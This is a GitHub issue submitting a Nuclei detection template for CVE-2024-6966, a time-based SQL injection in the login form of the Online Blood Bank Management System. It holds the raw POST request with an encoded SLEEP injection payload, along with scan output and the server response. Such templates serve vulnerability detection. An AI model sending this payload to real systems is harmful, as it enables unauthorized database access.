search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
8.98k stars 2.57k forks source link

CVE-2024-6966 Online Blood Bank Management System - SQL Injection in Login Page #10393

Open cl4irv0yance opened 1 month ago

cl4irv0yance commented 1 month ago

Template Information:

In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection.

References can be found here: https://nvd.nist.gov/vuln/detail/CVE-2024-6966 https://github.com/HermesCui/CVE/issues/1

Nuclei Template:

id: cve-2024-6966

info:
  name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
  author: cl4irv0yance
  description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection. 
  severity: High
  reference: 
    - https://github.com/HermesCui/CVE/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6966
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: cve-2024-6966
  tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode

http:
  - raw:
      - |
        @timeout: 25s
        POST /bloodbank/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In

     matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Username'
          - 'Password'
          - 'Keep me Signed in'
          - 'Forgot Password'
          - 'Wrong email or password'
        condition: and

      - type: dsl
        dsl:
          - 'duration>=10'

Template Results

nuclei -u https://test.site/bloodbank -t cve-2024-6966.yaml                                                                   

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.2.9

                projectdiscovery.io

[INF] Current nuclei version: v3.2.9 (outdated)
[INF] Current nuclei-templates version: v9.9.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[cve-2024-6966] [http] [high] https://test.site/bloodbank/login.php

Page Response (only including html in response - snipped css)

HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 23:17:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5588
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[..SNIP..]

<div class="login-wrap">
  <div class="login-html">

  <form action="" method="post">
    <input id="tab-1" type="radio" name="tab" class="sign-in" checked><label for="tab-1" class="tab">Login</label>
    <input id="tab-2" type="radio" name="tab" class="sign-up"><label for="tab-2" class="tab"></label>

            <div class="login-form">
      <div class="sign-in-htm">
        <div class="group">
          <form action="home.php">
          <label for="user" class="label">Username</label>
          <input id="user" type="text" class="input" name="user">
        </div>
        <div class="group">
          <label for="pass" class="label">Password</label>
          <input id="pass" type="password" class="input" data-type="password" name="pass">
        </div>
        <div class="group">
          <input id="check" type="checkbox" class="check" checked>
          <label for="check"><span class="icon"></span> Keep me Signed in</label>
        </div>
        <div class="group">
          <input type="submit" style="background-color: green; color: white" class="button" name="sub" value="Log In">
        </div>
          <div class="group">
            <a href="forgot.php">Forgot Password</a>

      <script>alert('Wrong email or password')</script>         <div class="footer-left">
                <h3></span></h3>

             <div class="hr"></div>
        <div class="foot-lnk">
          <a href="forgot.html"></a>
        </div>
      </div>
princechaddha commented 3 weeks ago

Hello, the response time for this issue was longer than usual because the team was traveling for DEFCON. The team will respond to this issue shortly. Thank you for your contribution